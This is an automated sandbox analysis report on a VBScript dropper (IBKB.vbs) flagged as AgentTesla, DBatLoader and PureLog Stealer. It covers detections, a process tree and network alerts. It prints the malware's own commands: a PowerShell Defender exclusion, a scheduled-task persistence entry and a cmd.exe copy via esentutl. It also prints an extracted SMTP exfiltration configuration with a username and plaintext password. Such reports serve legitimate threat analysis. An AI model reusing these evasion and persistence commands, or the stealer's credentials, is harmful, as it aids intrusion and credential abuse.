Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
IBKB.vbs

Overview

General Information

Sample name:IBKB.vbs
Analysis ID:1559226
MD5:7bbca6f64625872be1a4dba80d36fce1
SHA1:a689a21b1b8a556b7e77be10f2e7ddc0dff7d360
SHA256:d61aad06edbdd7500c507a9df016cfbdc6a21731bd707c51d97abebf687c76b6
Tags:vbsuser-lowmal3
Infos:

Detection

AgentTesla, DBatLoader, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Benign windows process drops PE files
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected AgentTesla
Yara detected DBatLoader
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains very large strings
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops large PE files
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Queries random domain names (often used to prevent blacklisting and sinkholes)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Connects to many different domains
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 1100 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IBKB.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • x.exe (PID: 7096 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 53F0663219E6091CECD600C59389711F)
      • cmd.exe (PID: 6968 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\aymtmquJ.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • esentutl.exe (PID: 5176 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
      • esentutl.exe (PID: 1560 cmdline: C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Juqmtmya.PIF /o MD5: 5F5105050FBE68E930486635C5557F84)
        • conhost.exe (PID: 6564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • aymtmquJ.pif (PID: 5816 cmdline: C:\Users\Public\Libraries\aymtmquJ.pif MD5: C116D3604CEAFE7057D77FF27552C215)
        • Native_neworigin.exe (PID: 3176 cmdline: "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe" MD5: 9ECE2AAE8E8FA77849268DDA20CAEC7B)
        • Trading_AIBot.exe (PID: 6544 cmdline: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" MD5: E91A1DB64F5262A633465A0AAFF7A0B0)
          • powershell.exe (PID: 1532 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 5808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WmiPrvSE.exe (PID: 2000 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
          • schtasks.exe (PID: 6660 cmdline: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 04:29 /du 23:59 /sc daily /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)
            • conhost.exe (PID: 2884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • apihost.exe (PID: 5852 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" MD5: 1EFEA57D13329E8280EA1889052BFB56)
  • Juqmtmya.PIF (PID: 5640 cmdline: "C:\Users\Public\Libraries\Juqmtmya.PIF" MD5: 53F0663219E6091CECD600C59389711F)
    • aymtmquJ.pif (PID: 5776 cmdline: C:\Users\Public\Libraries\aymtmquJ.pif MD5: C116D3604CEAFE7057D77FF27552C215)
      • Native_neworigin.exe (PID: 5488 cmdline: "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe" MD5: 9ECE2AAE8E8FA77849268DDA20CAEC7B)
      • Trading_AIBot.exe (PID: 3276 cmdline: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" MD5: E91A1DB64F5262A633465A0AAFF7A0B0)
  • Juqmtmya.PIF (PID: 3920 cmdline: "C:\Users\Public\Libraries\Juqmtmya.PIF" MD5: 53F0663219E6091CECD600C59389711F)
    • aymtmquJ.pif (PID: 5068 cmdline: C:\Users\Public\Libraries\aymtmquJ.pif MD5: C116D3604CEAFE7057D77FF27552C215)
      • Native_neworigin.exe (PID: 2676 cmdline: "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe" MD5: 9ECE2AAE8E8FA77849268DDA20CAEC7B)
      • Trading_AIBot.exe (PID: 5540 cmdline: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" MD5: E91A1DB64F5262A633465A0AAFF7A0B0)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Host": "s82.gocheapweb.com\"", "Username": "info2@j-fores.com", "Password": "london@1759 "}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000013.00000002.2549393142.0000000002A36000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
    00000013.00000002.2572030022.0000000004255000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      00000009.00000002.2398990353.0000000003FC5000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        00000009.00000003.2169212695.000000000091E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          00000002.00000003.2069405714.000000007FC50000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
            Click to see the 26 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            24.2.Native_neworigin.exe.2b1711e.1.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              24.2.Native_neworigin.exe.5160000.4.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                9.2.Native_neworigin.exe.401c190.5.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  9.2.Native_neworigin.exe.5850000.8.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    9.3.Native_neworigin.exe.91e438.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      Click to see the 52 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
                      Source: File createdAuthor: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 7096, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
                      Sigma detected: Execution from Suspicious Folder
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Libraries\aymtmquJ.pif, CommandLine: C:\Users\Public\Libraries\aymtmquJ.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\aymtmquJ.pif, NewProcessName: C:\Users\Public\Libraries\aymtmquJ.pif, OriginalFileName: C:\Users\Public\Libraries\aymtmquJ.pif, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 7096, ParentProcessName: x.exe, ProcessCommandLine: C:\Users\Public\Libraries\aymtmquJ.pif, ProcessId: 5816, ProcessName: aymtmquJ.pif
                      Sigma detected: New RUN Key Pointing to Suspicious Folder
                      Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Juqmtmya.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 7096, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Juqmtmya
                      Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 6544, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 1532, ProcessName: powershell.exe
                      Sigma detected: WScript or CScript Dropper
                      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IBKB.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IBKB.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IBKB.vbs", ProcessId: 1100, ProcessName: wscript.exe
                      Sigma detected: CurrentVersion Autorun Keys Modification
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Juqmtmya.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 7096, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Juqmtmya
                      Sigma detected: Execution of Suspicious File Type Extension
                      Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\aymtmquJ.pif, CommandLine: C:\Users\Public\Libraries\aymtmquJ.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\aymtmquJ.pif, NewProcessName: C:\Users\Public\Libraries\aymtmquJ.pif, OriginalFileName: C:\Users\Public\Libraries\aymtmquJ.pif, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 7096, ParentProcessName: x.exe, ProcessCommandLine: C:\Users\Public\Libraries\aymtmquJ.pif, ProcessId: 5816, ProcessName: aymtmquJ.pif
                      Sigma detected: Powershell Defender Exclusion
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 6544, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 1532, ProcessName: powershell.exe
                      Sigma detected: Startup Folder File Write
                      Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ProcessId: 6544, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk
                      Sigma detected: Suspicious Add Scheduled Task Parent
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 04:29 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 04:29 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 6544, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 04:29 /du 23:59 /sc daily /ri 1 /f, ProcessId: 6660, ProcessName: schtasks.exe
                      Sigma detected: Suspicious Outbound SMTP Connections
                      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 51.195.88.199, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe, Initiated: true, ProcessId: 3176, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49771
                      Sigma detected: Suspicious Schtasks From Env Var Folder
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 04:29 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 04:29 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 6544, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 04:29 /du 23:59 /sc daily /ri 1 /f, ProcessId: 6660, ProcessName: schtasks.exe
                      Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                      Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IBKB.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IBKB.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IBKB.vbs", ProcessId: 1100, ProcessName: wscript.exe
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 6544, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 1532, ProcessName: powershell.exe

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-20T10:24:34.113260+010020283713Unknown Traffic192.168.2.549705198.252.105.91443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-20T10:24:57.177822+010020516491A Network Trojan was detected192.168.2.5524991.1.1.153UDP
                      2024-11-20T10:25:17.134094+010020516491A Network Trojan was detected192.168.2.5635401.1.1.153UDP
                      2024-11-20T10:25:27.879440+010020516491A Network Trojan was detected192.168.2.5609281.1.1.153UDP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-20T10:24:53.747785+010020516481A Network Trojan was detected192.168.2.5512981.1.1.153UDP
                      2024-11-20T10:25:15.402425+010020516481A Network Trojan was detected192.168.2.5507471.1.1.153UDP
                      2024-11-20T10:25:26.514301+010020516481A Network Trojan was detected192.168.2.5511561.1.1.153UDP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-20T10:24:48.209894+010020181411A Network Trojan was detected54.244.188.17780192.168.2.549707TCP
                      2024-11-20T10:24:50.252791+010020181411A Network Trojan was detected18.141.10.10780192.168.2.549708TCP
                      2024-11-20T10:24:54.647482+010020181411A Network Trojan was detected44.221.84.10580192.168.2.549731TCP
                      2024-11-20T10:26:26.064766+010020181411A Network Trojan was detected47.129.31.21280192.168.2.550011TCP
                      2024-11-20T10:26:32.924764+010020181411A Network Trojan was detected34.246.200.16080192.168.2.550017TCP
                      2024-11-20T10:26:33.604162+010020181411A Network Trojan was detected18.208.156.24880192.168.2.550018TCP
                      2024-11-20T10:26:36.015830+010020181411A Network Trojan was detected13.251.16.15080192.168.2.550020TCP
                      2024-11-20T10:26:38.794559+010020181411A Network Trojan was detected35.164.78.20080192.168.2.550023TCP
                      2024-11-20T10:26:43.938547+010020181411A Network Trojan was detected34.211.97.4580192.168.2.550029TCP
                      2024-11-20T10:27:00.479581+010020181411A Network Trojan was detected3.94.10.3480192.168.2.550043TCP
                      2024-11-20T10:27:01.876394+010020181411A Network Trojan was detected18.246.231.12080192.168.2.550044TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-20T10:24:48.209894+010020377711A Network Trojan was detected54.244.188.17780192.168.2.549707TCP
                      2024-11-20T10:24:50.252791+010020377711A Network Trojan was detected18.141.10.10780192.168.2.549708TCP
                      2024-11-20T10:24:54.647482+010020377711A Network Trojan was detected44.221.84.10580192.168.2.549731TCP
                      2024-11-20T10:26:26.064766+010020377711A Network Trojan was detected47.129.31.21280192.168.2.550011TCP
                      2024-11-20T10:26:32.924764+010020377711A Network Trojan was detected34.246.200.16080192.168.2.550017TCP
                      2024-11-20T10:26:33.604162+010020377711A Network Trojan was detected18.208.156.24880192.168.2.550018TCP
                      2024-11-20T10:26:36.015830+010020377711A Network Trojan was detected13.251.16.15080192.168.2.550020TCP
                      2024-11-20T10:26:38.794559+010020377711A Network Trojan was detected35.164.78.20080192.168.2.550023TCP
                      2024-11-20T10:26:43.938547+010020377711A Network Trojan was detected34.211.97.4580192.168.2.550029TCP
                      2024-11-20T10:27:00.479581+010020377711A Network Trojan was detected3.94.10.3480192.168.2.550043TCP
                      2024-11-20T10:27:01.876394+010020377711A Network Trojan was detected18.246.231.12080192.168.2.550044TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-20T10:24:48.189753+010028508511Malware Command and Control Activity Detected192.168.2.54970754.244.188.17780TCP
                      2024-11-20T10:26:02.433224+010028508511Malware Command and Control Activity Detected192.168.2.55000582.112.184.19780TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus / Scanner detection for submitted sample
                      Source: IBKB.vbsAvira: detected
                      Antivirus detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeAvira: detection malicious, Label: TR/Dropper.Gen
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeAvira: detection malicious, Label: W32/Patched.Ren.Gen
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeAvira: detection malicious, Label: TR/Dropper.Gen
                      Found malware configuration
                      Source: esentutl.exe.1560.6.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "s82.gocheapweb.com\"", "Username": "info2@j-fores.com", "Password": "london@1759 "}
                      Multi AV Scanner detection for submitted file
                      Source: IBKB.vbsReversingLabs: Detection: 39%
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeJoe Sandbox ML: detected
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\x.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeJoe Sandbox ML: detected
                      Source: unknownHTTPS traffic detected: 198.252.105.91:443 -> 192.168.2.5:49705 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.5:49726 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.5:49824 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.5:49900 version: TLS 1.2
                      Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdb source: x.exe, x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2069405714.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2275324060.0000000020AE4000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2169383134.00000000022C6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2275324060.0000000020B20000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2070521735.000000007F920000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: _.pdb source: Native_neworigin.exe, 00000009.00000002.2398990353.0000000003FC5000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 00000009.00000003.2169212695.000000000091E000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000009.00000002.2397545638.0000000002A56000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000009.00000002.2413068752.0000000005200000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000005.00000003.2139842798.00000000052A0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdbH source: x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmp
